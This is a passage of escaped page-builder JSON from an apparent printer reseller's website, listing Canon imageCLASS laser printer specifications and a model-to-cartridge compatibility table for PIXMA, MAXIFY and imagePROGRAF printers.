id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 